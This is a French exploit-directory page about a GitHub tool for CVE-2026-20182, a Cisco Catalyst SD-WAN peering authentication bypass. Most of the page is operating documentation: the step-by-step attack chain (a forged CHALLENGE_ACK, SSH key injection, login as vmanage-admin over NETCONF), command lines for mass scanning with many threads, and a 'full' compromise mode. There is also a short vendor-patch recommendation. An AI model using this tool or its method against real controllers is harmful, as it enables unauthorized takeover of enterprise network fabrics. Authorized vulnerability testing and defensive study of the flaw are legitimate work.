Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-20182 — Contournement d'authentification du peering Cisco Catalyst SD-WAN | Kitploit
Outils/GitHubGitHub/nxploited/cve-2026-20182
Authentification et AutorisationAnalyse des VulnérabilitésExploitationSécurité RéseauTests d'IntrusionRed Teaming
GitHubnxploited/cve-2026-20182

CVE-2026-20182

Contournement d'authentification du peering Cisco Catalyst SD-WAN

Voir le dépôt
128il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-20182

Contournement de l'authentification de peering Cisco Catalyst SD-WAN

CVE-2026-20182 — Contournement de l'authentification de peering Cisco Catalyst SD-WAN

Outil d'évaluation pour les tests autorisés du contournement de l'authentification de peering du contrôleur/gestionnaire Cisco Catalyst SD-WAN (CVE-2026-20182).

CVECVE-2026-20182
GravitéCritique (CVSS 10.0)
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
ProduitContrôleur Cisco Catalyst SD-WAN (anciennement vSmart) · Gestionnaire Cisco Catalyst SD-WAN (anciennement vManage)
ProblèmeMécanisme d'authentification de peering non appliqué correctement
ScriptCVE-2026-20182.py

Résumé de la vulnérabilité

Avis de mai 2026 : une faille dans la poignée de main de connexion de contrôle / l'authentification de peering permet à un attaquant distant non authentifié de contourner l'authentification et d'obtenir un accès interne à privilèges élevés sur les systèmes affectés.

Un attaquant envoie des requêtes falsifiées au système affecté. En cas de succès, l'attaquant peut s'authentifier en tant que compte interne, à privilèges élevés, non root et atteindre NETCONF, permettant la manipulation de la configuration du tissu SD-WAN.

ÉlémentDétail
Vecteur d'attaqueRéseau
Privilèges requisAucun
Interaction utilisateurAucune
PortéeModifiée
ImpactConfidentialité, intégrité et disponibilité — Élevé

Recommandation : Appliquer les correctifs de sécurité Cisco conformément aux directives officielles du fournisseur. Limiter l'exposition du plan de gestion, surveiller les connexions du plan de contrôle et auditer les contrôleurs SD-WAN pour détecter les modifications de configuration non autorisées.


Contact

Telegram : @KNxploited


Aperçu de la console

Console d'opérations CVE-2026-20182


Outil : CVE-2026-20182.py

Framework d'exploitation Python 3 pour CVE-2026-20182 contre Cisco SD-WAN vdaemon (UDP/DTLS 12346).

Ce qu'il fait (étape par étape)

ÉtapePhaseDescription
1Chargement des ciblesAnalyser targets.txt, fusionner les doublons par (host, domain_id, site_id)
2Vérification préalable OpenSSLCharger les bibliothèques partagées OpenSSL 3.x/4.x pour DTLS personnalisé
3Connexion DTLSSe connecter au port UDP cible (toujours 12346 en premier, puis liste de ports optionnelle)
4CHALLENGERecevoir le CHALLENGE (0x08) du serveur
5CHALLENGE_ACKEnvoyer un CHALLENGE_ACK falsifié en tant que vHub (type 2) — contournement de l'authentification
6HelloCompléter l'échange Hello — confirme le chemin de contournement
7aMode CHECKS'arrêter ici — enregistrer contournement / Hello OK uniquement (pas de clés, pas de SSH)
7bMode FULLInjecter une clé publique SSH via VMANAGE_TO_PEER
8ACK d'injectionAttendre REGISTER_TO_VMANAGE (0x0D) comme accusé de réception protocolaire
9Vérification SSHTester la connexion en tant que vmanage-admin sur TCP 830 (NETCONF), optionnellement 22
10SortieTrier les résultats en fichiers de niveaux + liste de commandes lisibles

Rétablissement du tissu : En cas de TEAR_DOWN ou de discordance de paramètres, réessaye avec les préréglages alternatifs domaine/site (1,100), (1,1), (0,0) sauf si --no-fallback.


Niveaux de résultats (lire attentivement)

NiveauFichierSignification
01 — SSH confirmécisco_sdwan_01_confirmed_ssh.jsonlssh_verified=true — seul niveau traité comme preuve de compromission complète
02 — ACK d'injection uniquementcisco_sdwan_02_inject_ack_only.jsonlLe protocole a accepté l'injection de clé ; la connexion SSH a échoué
03 — Contournement uniquementcisco_sdwan_03_bypass_only.jsonlHello/contournement OK ; aucune injection confirmée

Important

  • Mode check → niveau 03 au mieux (sonde de contournement). Pas une preuve d'exploitation complète.
  • Mode full → viser le niveau 01 (ssh_verified).
  • https://host dans la liste → indice web TCP uniquement (80/443). Pas UDP DTLS sur 443.

Prérequis

PrérequisRemarques
Python3.9+
pipcryptography, rich
OpenSSLBibliothèques partagées 3.x ou 4.x (libssl + libcrypto) — obligatoire
pip install -r requirements.txt

OpenSSL (système)

Windows

  1. Installer Win64 OpenSSL 3.x ou équivalent
  2. Ajouter bin\ au PATH, ou définir :
OPENSSL_HOME=C:\Program Files\OpenSSL-Win64

Linux

# Debian/Ubuntu
sudo apt install libssl3 openssl
export LD_LIBRARY_PATH=/usr/lib/x86_64-linux-gnu:$LD_LIBRARY_PATH

L'outil se ferme au démarrage si OpenSSL ne peut pas être chargé.


Démarrage rapide

Menu interactif (par défaut)

python CVE-2026-20182.py
  • Configurer les options 1–11, puis 0 = LANCER L'ANALYSE
  • Mode d'exécution par défaut : check (sonde de contournement sûre)

Non interactif (automatisation)

python CVE-2026-20182.py -y

Modes d'exécution

ModeDrapeauInjection SSHVérification SSHQuand l'utiliser
CHECK--mode check (défaut)NonNonCriblage de masse, détection de contournement
FULL--mode fullOuiOui (sauf --no-ssh-verify)Preuve de compromission

CHECK — sonde de contournement uniquement

python CVE-2026-20182.py -y --mode check

FULL — injection de clé + vérification SSH (cibles autorisées uniquement)

python CVE-2026-20182.py -y --mode full

Référence CLI (chaque drapeau + exemple)

Cibles et workers

-f / --file — liste de cibles (défaut : targets.txt)

python CVE-2026-20182.py -y -f my_controllers.txt --mode check

-t / --threads — threads workers (1–200, défaut 12)

python CVE-2026-20182.py -y -f targets.txt -t 30 --mode check

--domain — DOMAIN_ID par défaut quand absent de la liste (défaut : 1)

python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 100 --mode check

--site — SITE_ID par défaut quand absent de la liste (défaut : 100)

python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 50 --mode full

Mode et automatisation

--mode — check | full

python CVE-2026-20182.py -y --mode full -f targets.txt

-y / --yes — ignorer le menu interactif ; utiliser uniquement les valeurs CLI

python CVE-2026-20182.py -y -f targets.txt --mode check -t 20

Vérification SSH

--no-ssh-verify — ignorer le test SSH après injection (déconseillé en mode full)

python CVE-2026-20182.py -y --mode full --no-ssh-verify -f targets.txt

--verify-ssh22 — essayer aussi TCP 22 après 830

python CVE-2026-20182.py -y --mode full --verify-ssh22 -f targets.txt

UDP / tissu

--no-try-list-udp — uniquement UDP 12346 ; ignorer :port de la liste

python CVE-2026-20182.py -y --no-try-list-udp -f targets.txt --mode check

--extra-udp-ports — lab : ports UDP supplémentaires sur chaque hôte

Télécharger l’outil